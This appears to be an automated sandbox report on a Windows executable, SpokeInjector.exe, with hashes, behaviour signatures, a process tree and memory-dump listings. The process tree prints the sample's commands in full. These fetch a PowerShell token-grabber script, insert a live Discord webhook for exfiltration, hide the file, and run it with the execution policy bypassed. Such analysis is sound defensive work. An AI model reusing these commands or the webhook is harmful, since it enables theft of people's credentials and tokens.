4be581640a2bf3db6ec7c45dbabfeadb57dd823268ad9eb79c92e3554e826c1e

Analysis

max time kernel
119s
max time network
125s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
12-10-2023 07:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SpokeInjector.exe
Size

89KB
MD5

e311885e6dfe5e9a3efe22a3ee6aed45
SHA1

7fd45984ca4eae692eaa3c4be267fbf344528cc4
SHA256

4be581640a2bf3db6ec7c45dbabfeadb57dd823268ad9eb79c92e3554e826c1e
SHA512

0b8812eb9deccf0403fad52f8477a93889bdc721ccb3aa5473093608b30468e0e168df92c143e808f2e3e6d60d5499fe403d4ef6d101a5a438f2eed41140f62a
SSDEEP

1536:/7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfNwqUXOs:z7DhdC6kzWypvaQ0FxyNTBfNVU7

Score

1^/10

Malware Config

Signatures

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3036	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2120	powershell.exe
2296	powershell.exe
2460	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 1756	2228	SpokeInjector.exe	28
PID 2228 wrote to memory of 1756	2228	SpokeInjector.exe	28
PID 2228 wrote to memory of 1756	2228	SpokeInjector.exe	28
PID 2228 wrote to memory of 1756	2228	SpokeInjector.exe	28
PID 1756 wrote to memory of 1668	1756	cmd.exe	29
PID 1756 wrote to memory of 1668	1756	cmd.exe	29
PID 1756 wrote to memory of 1668	1756	cmd.exe	29
PID 1668 wrote to memory of 848	1668	net.exe	30
PID 1668 wrote to memory of 848	1668	net.exe	30
PID 1668 wrote to memory of 848	1668	net.exe	30
PID 1756 wrote to memory of 2120	1756	cmd.exe	31
PID 1756 wrote to memory of 2120	1756	cmd.exe	31
PID 1756 wrote to memory of 2120	1756	cmd.exe	31
PID 1756 wrote to memory of 2744	1756	cmd.exe	32
PID 1756 wrote to memory of 2744	1756	cmd.exe	32
PID 1756 wrote to memory of 2744	1756	cmd.exe	32
PID 1756 wrote to memory of 2296	1756	cmd.exe	33
PID 1756 wrote to memory of 2296	1756	cmd.exe	33
PID 1756 wrote to memory of 2296	1756	cmd.exe	33
PID 1756 wrote to memory of 2460	1756	cmd.exe	35
PID 1756 wrote to memory of 2460	1756	cmd.exe	35
PID 1756 wrote to memory of 2460	1756	cmd.exe	35
PID 1756 wrote to memory of 2992	1756	cmd.exe	37
PID 1756 wrote to memory of 2992	1756	cmd.exe	37
PID 1756 wrote to memory of 2992	1756	cmd.exe	37
PID 1756 wrote to memory of 3036	1756	cmd.exe	38
PID 1756 wrote to memory of 3036	1756	cmd.exe	38
PID 1756 wrote to memory of 3036	1756	cmd.exe	38

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2744	attrib.exe
2992	attrib.exe

C:\Users\Admin\AppData\Local\Temp\SpokeInjector.exe
"C:\Users\Admin\AppData\Local\Temp\SpokeInjector.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C024.tmp\C025.tmp\C026.bat C:\Users\Admin\AppData\Local\Temp\SpokeInjector.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1154460921306042450/FcC6bK-B6wF9Kdqc1CVFIbNFZN0A_0627G4mNEescCSkoyZfLO_wsI4nn18mKtLmyOe9' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\system32\attrib.exe
    attrib +h +s powershell123.ps1
    3⤵
    - Views/modifies file attributes
    PID:2744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\system32\attrib.exe
    attrib -h -s powershell123.ps1
    3⤵
    - Views/modifies file attributes
    PID:2992
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C024.tmp\C025.tmp\C026.bat

Filesize
848B

MD5
cbee503eba21e7df2a2560d0421e0026

SHA1
797e3420ebfdc167b7a1f1da57ff416359113ede

SHA256
4cef7f8059117edc6e700329c30a24e9ab9f9c3ad762970773c755f2d73af31d

SHA512
41d1cf815b85e6363a07b7bbb8ba2146e16f9cce8d2a392e22b58d904451c546ea3360e776d64087642778a90487022acd8c6fe44d03981196663831aad1d292

Download Submit
C:\Users\Admin\AppData\Local\Temp\powershell123.ps1

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
223f4056bd02118ee3fc925837ba047c

SHA1
e8e13ea7c6bb2636c4cf931dcd1e8115355dd4fd

SHA256
bdff19597f962694255286f37f404207ec7476bdc5452eb458db0f59e9a2938f

SHA512
dd0a227f5f3d6dc4015a475d63fc725867c007a35cb86b3363777237f988c66fef1d8ed35c878f71adf7f3b72517acf3933bcd16b218667d91b4229bef90f122

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
223f4056bd02118ee3fc925837ba047c

SHA1
e8e13ea7c6bb2636c4cf931dcd1e8115355dd4fd

SHA256
bdff19597f962694255286f37f404207ec7476bdc5452eb458db0f59e9a2938f

SHA512
dd0a227f5f3d6dc4015a475d63fc725867c007a35cb86b3363777237f988c66fef1d8ed35c878f71adf7f3b72517acf3933bcd16b218667d91b4229bef90f122

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H8438RJ3C25D8YBXPJ1G.temp

Filesize
7KB

MD5
223f4056bd02118ee3fc925837ba047c

SHA1
e8e13ea7c6bb2636c4cf931dcd1e8115355dd4fd

SHA256
bdff19597f962694255286f37f404207ec7476bdc5452eb458db0f59e9a2938f

SHA512
dd0a227f5f3d6dc4015a475d63fc725867c007a35cb86b3363777237f988c66fef1d8ed35c878f71adf7f3b72517acf3933bcd16b218667d91b4229bef90f122

Download Submit
memory/2120-13-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/2120-6-0x000000001B330000-0x000000001B612000-memory.dmp

Filesize
2.9MB

Download
memory/2120-10-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/2120-12-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/2120-15-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2120-9-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2120-8-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2120-7-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/2120-11-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/2296-29-0x000007FEF3FA0000-0x000007FEF493D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-23-0x0000000002550000-0x0000000002558000-memory.dmp

Filesize
32KB

Download
memory/2296-25-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2296-26-0x000007FEF3FA0000-0x000007FEF493D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-27-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2296-28-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2296-24-0x000007FEF3FA0000-0x000007FEF493D000-memory.dmp

Filesize
9.6MB

Download
memory/2296-22-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2460-37-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/2460-36-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-35-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-38-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/2460-39-0x00000000029A0000-0x0000000002A20000-memory.dmp

Filesize
512KB

Download
memory/2460-40-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

Filesize
9.6MB

Download